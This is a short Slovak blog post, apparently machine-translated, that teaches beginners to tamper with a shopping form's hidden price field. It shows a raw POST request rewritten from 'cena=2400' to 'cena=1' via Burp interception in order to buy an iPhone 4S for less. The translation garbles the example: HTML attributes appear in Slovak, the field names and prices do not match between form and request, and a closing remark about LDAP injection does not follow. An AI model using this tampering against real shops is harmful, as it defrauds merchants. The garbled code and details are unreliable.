Penetrácia vniknutí: Použitie HTTP hlavičiek

Admin · Zverejnené 7. 2. 2015 17:59:07

O použití HTTP hlavičiek

HTTP hlavička sa bežne používa v prenosovom mechanizme webových stránok, ale väčšina začiatočníkov v Číne si tento článok nevšimla, tento článok je venovaný len začiatočníkom, úlohe HTTP hlavičky v procese narušenia.

Vezmime si nákupnú stránku ako príklad na analýzu malej časti úlohy HTTP hlavičiek.

Najprv si pozrime jeden formulár na nákupnej stránke.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<typ vstupu="skrytý" názov="cena" hodnota="449">

<typ vstupu="odoslať" hodnota="Kúpiť">

</form>

Počas úvodného procesu si urobte screenshot jeho hlavičky http správy a pozrite sa na to

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

množstvo=1&cena=2400

Aj keď sa pole ceny pri otvorení nákupnej stránky nezobrazuje na stránke, používateľ ho môže stále upravovať a ovládať.

Existujú dva spôsoby, ako dosiahnuť úpravu

1. Uložiť zdrojový kód HTML na úpravu a potom ho znovu načítať do prehliadača na spustenie

2. Použitie proxy interception na úpravu HTTP hlavičiek (konštrukcia proxy v nástroji burp)

Vezmime si ako príklad HTTP hlavičku vyššie
Pred zmenou
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

množstvo=1&cena=2400

Po zmene
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

množstvo=1&cena=1

V poslednom riadku má pole Cena hodnotu 2400 a ak ju zmeníme na 1, môžeme získať iPhone 4S za nižšiu cenu.

Tento článok poskytuje len predstavu o nečakaných prínosoch, ako je injekcia LDAP.

[Bezpečnostný návod] Penetrácia vniknutí: Použitie HTTP hlavičiek

Súvisiace príspevky

Zobrazené sekcie